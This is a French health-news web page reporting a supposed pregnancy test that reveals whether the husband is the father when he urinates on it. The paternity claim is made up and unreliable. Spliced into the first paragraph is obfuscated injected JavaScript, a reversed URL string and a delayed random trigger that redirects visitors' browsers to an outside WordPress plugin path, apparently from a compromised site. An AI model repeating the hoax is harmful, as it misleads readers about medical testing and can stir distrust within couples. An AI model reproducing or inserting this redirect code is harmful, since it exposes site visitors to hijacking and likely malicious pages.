SANTETECH-SCIENCE

Science: Un nouveau test de grossesse révèle qui est le père de votre bébé

La plupart des femmes ont déjà utilisé un test de grossesse à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domicile (de n’importe quelle marque) dans leur vie.

Mais personne ne s’attendait à l’émergence d’une nouvelle version du test de grossesse disponible sur le marché, développée avec la technologie de pointe DUO-Parental. C’est un système plus sensé pour détecter les hormones féminines et masculines, ce qui a permis de déterminer si vous êtes enceinte et si votre mari est le véritable père. Il utilise comme test traditionnel, en contact direct avec l’urine environ trois à quatre minutes et si deux lignes apparaissent, cela signifie que vous êtes enceinte. Maintenant, si le prétendu père urine et que ces lignes sont effacées, il est clair qu’il n’est pas le père.

Il semble que l’avancement de la technologie dans ce secteur spécifique ne convainc pas les utilisatrices: «ne te fous pas de moi, si mon mari urine et que mes lignes disparaissent, je meurs. Cela ne me dérange pas, ils peuvent juste aller se faire foutre ».

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :